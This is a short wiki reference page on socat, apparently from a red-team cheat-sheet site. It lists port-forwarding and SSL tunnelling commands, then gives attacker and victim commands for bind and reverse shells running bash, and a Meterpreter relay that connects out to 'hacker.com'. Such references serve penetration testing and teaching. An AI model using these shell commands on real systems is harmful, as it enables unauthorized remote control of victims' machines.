Socat

From RCATs

Description

socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named pipes, and pseudo terminals.

socat can be used, e.g., as TCP port forwarder (one-shot or daemon), as an external socksifier, for attacking weak firewalls, as a shell interface to UNIX sockets, IP6 relay, for redirecting TCP oriented programs to a serial line, to logically connect serial lines on different computers, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections.

Commands

# Listen on port 8080 forward all traffic to 80
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

# Tunnel connection from Local TCP Port to remote service
socat -v tcp4-listen:8000,reuseaddr,fork tcp4:6.6.6.6:80

# Tunnel plain text connection to SSL Endpoint
# (verify=0 disables checking of the endpoint's certificate, so the relay will also connect to an impersonated endpoint)
socat -v tcp4-listen:9000,reuseaddr,fork ssl:6.6.6.6:443,verify=0

# Present a local certificate (cert=) on the SSL/TLS connection; verify=0 still skips checking the remote certificate
socat -v tcp4-listen:9000,reuseaddr,fork ssl:6.6.6.6:443,verify=0,cert=./provisional_prov.pem

# SSL/TLS listener on localhost 7000 relaying to remote host on port 6000
socat -v openssl-listen:7000,cert=cert.pem,verify=0,reuseaddr,fork tcp4:6.6.6.6:6000

Bind Shell

# Attacker
socat FILE:`tty`,raw,echo=0 TCP4:<victim_ip>:1337

# Victim
socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

Reverse Shell

# Attacker
socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0

# Victim
socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane

Port to Port through SOCKS Proxy

socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678

Meterpreter Through SSL[1]

# Create meterpreter backdoor to port 3333 and start msfconsole listener on that port
# Attacker
socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1 TCP:127.0.0.1:3333

# Victim (the '|' address chain is socat 2 syntax and must be quoted so the shell does not treat it as a pipe)
socat.exe TCP-LISTEN:2222 "OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5"

References